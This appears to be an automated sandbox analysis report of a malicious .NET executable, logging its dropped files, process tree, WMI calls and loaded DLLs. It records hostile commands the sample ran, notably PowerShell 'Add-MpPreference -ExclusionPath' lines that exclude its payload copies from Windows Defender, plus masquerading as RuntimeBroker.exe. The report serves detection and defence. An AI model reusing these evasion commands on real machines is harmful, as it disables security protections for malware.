Source: W4tW72sfAD.exe, 00000000.00000000.1644759918.0000000000A12000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs W4tW72sfAD.exe
Source: W4tW72sfAD.exe, 00000000.00000002.1766639664.000000001B862000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameBzUOsUELloh7lcyuhpXTcoPR5FGxF70O4 vs W4tW72sfAD.exe
Uses 32bit PE files
Source: W4tW72sfAD.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: W4tW72sfAD.exe, EwV3ECxYhIse1SOarW.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@45/93@4/5
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\Desktop\cnkBPSdA.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_03
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Mutant created: NULL
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\e185fbb618a233f9f6c1861641b571576fcfea1e7ff2912d0387b1f1e908cb75
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File created: C:\Users\user\AppData\Local\Temp\eqmixkc3 Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
Source: W4tW72sfAD.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: W4tW72sfAD.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\W4tW72sfAD.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: W4tW72sfAD.exe ReversingLabs: Detection: 68%
Source: C:\Users\user\Desktop\W4tW72sfAD.exe File read: C:\Users\user\Desktop\W4tW72sfAD.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\W4tW72sfAD.exe "C:\Users\user\Desktop\W4tW72sfAD.exe"
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP"
Source: unknown Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: unknown Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: unknown Process created: C:\Users\Public\Downloads\RuntimeBroker.exe C:\Users\Public\Downloads\RuntimeBroker.exe
Source: unknown Process created: C:\Users\Public\Downloads\RuntimeBroker.exe C:\Users\Public\Downloads\RuntimeBroker.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: unknown Process created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
Source: unknown Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
Source: unknown Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: unknown Process created: C:\Users\Public\Downloads\RuntimeBroker.exe "C:\Users\Public\Downloads\RuntimeBroker.exe"
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eqmixkc3\eqmixkc3.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office 15\ClientX64\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Downloads\RuntimeBroker.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\internet explorer\en-GB\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe' Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9x00cPKFqM.bat" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESCC57.tmp" "c:\Windows\System32\CSCC6B1193CD9FE40B5844F837FF967B9E7.TMP" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\juptXkyeRvGsIZrQGeVEsrnWhD.exe "C:\Users\Default User\juptXkyeRvGsIZrQGeVEsrnWhD.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\W4tW72sfAD.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: version.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\Public\Downloads\RuntimeBroker.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
